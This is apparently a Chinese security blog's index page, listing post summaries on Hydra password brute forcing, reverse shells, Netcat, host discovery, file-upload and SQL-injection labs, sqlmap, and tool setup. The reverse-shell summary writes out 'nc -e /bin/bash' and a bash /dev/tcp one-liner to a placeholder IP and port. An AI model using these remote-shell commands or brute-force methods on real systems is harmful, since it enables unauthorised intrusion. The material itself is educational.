摘要: Hydra 在爆破工具中,hydra可是数一数二的存在,是著名黑客组织thc开发的一款开源的暴力密码破解工具,可以在线破解多种密码 Hydra 能够暴力破解以下协议:Asterisk、AFP、Cisco AAA、Cisco auth、Cisco enable、CVS、Firebird、FTP、HTT 阅读全文
posted @ 2022-03-15 14:09 Junglezt 阅读(1086) 评论(0) 推荐(0) 编辑
摘要: 反弹shell一般利用在命令执行漏洞中 在Netcat的学习中我们学习了如何使用nc -e /bin/bash反弹shell 这里分享一些除了nc以外其他的反弹方式 Bash反弹shell bash -i >& /dev/tcp/IP地址/端口 0>&1 /dev/tcp,udp,host,port 阅读全文
posted @ 2022-03-14 19:56 Junglezt 阅读(589) 评论(0) 推荐(0) 编辑
摘要: NetCat瑞士军刀,网络中的瑞士军刀,短小而精悍,功能齐全。简称为nc 端口扫描 参数 作用 -v 扫描端口是否开放 -z 指定端口范围 -w 指定扫描时间 -u 指定udp端口 例如:查看172.16.1.80的21端口是否开启 nc -v 172.16.1.80 21 扫描172.16.1.8 阅读全文
posted @ 2022-03-14 15:49 Junglezt 阅读(223) 评论(0) 推荐(0) 编辑
摘要: 主机发现工具 当我们加入一个网段时,不知道该网段主机存活的数量,首先我们要先进行主机存活发现 ping ping命令通常用户查看网络连接状态;得到服务器的IP地址,还有网络连接的延迟,另外可以通过TTL判断出目标的操作系统,在网上的服务器中,一般该值都被修改 在linux中,ping命令会一直进行p 阅读全文
posted @ 2022-03-14 13:21 Junglezt 阅读(834) 评论(0) 推荐(0) 编辑
摘要: upload-labs是一个练习文件上传的靶场 我们需要先安装中间件和PHP,推荐使用小皮面板,如何安装使用见sqli-labs搭建前部分 upload-labs下载:https://gitcode.net/mirrors/c0ny1/upload-labs/-/archive/master/upl 阅读全文
posted @ 2022-03-10 20:13 Junglezt 阅读(925) 评论(0) 推荐(0) 编辑
摘要: 补坑:报错注入 当我们 union 无法注入的时候,可以使用报错注入,这里我们有三种报错注入,xpth语法错误和count()+rand()+floor()+group by重复组建错误 extractvalue()函数 extractvalue()函数是对XML语法进行读取查看的函数,就例如我们熟 阅读全文
posted @ 2022-03-10 13:40 Junglezt 阅读(97) 评论(0) 推荐(0) 编辑
摘要: 设置文字大小 burpsuite安装好后,有些时候文字非常的小,看的眼睛直接痛死。 找到 User options -> Display 其中 User Interface -> Font size 设置burpsuite主题文字大小 其中 HTTP Message Display -> Font 阅读全文
posted @ 2022-02-26 16:42 Junglezt 阅读(846) 评论(0) 推荐(0) 编辑
摘要: 配置apt源地址 kali 自带的apt源是国外的,更新网速很慢,这里我设置的是中科大的源. http://mirrors.ustc.edu.cn/help/kali.html 1.复制页面的源地址 2.打开kali终端,输入命令sudo vim /etc/apt/sources.list 一直摁下 阅读全文
posted @ 2022-02-26 11:28 Junglezt 阅读(809) 评论(0) 推荐(0) 编辑
摘要: subline Text是一个轻量级的文本编辑器,类似于记事本,不过它拥有代码高亮,简约好看的主题。 下载地址:https://download.sublimetext.com/sublime_text_build_4126_x64_setup.exe 安装过后,默认时英文的状态。 设置中文 1.按 阅读全文
posted @ 2022-02-25 22:18 Junglezt 阅读(227) 评论(0) 推荐(0) 编辑
摘要: sqlmap使用,简介请见官网sqlmap.org ##sqlmap的经典操作 | 参数 | 作用 | | | | | -u | 指定url | | -l/-r | 读取文件内容进行注入,例如burpsuite保存的数据包头 | | --batch | 默认会问我们有很多问题,让slqmap自动选择 阅读全文
posted @ 2022-02-24 14:41 Junglezt 阅读(468) 评论(0) 推荐(0) 编辑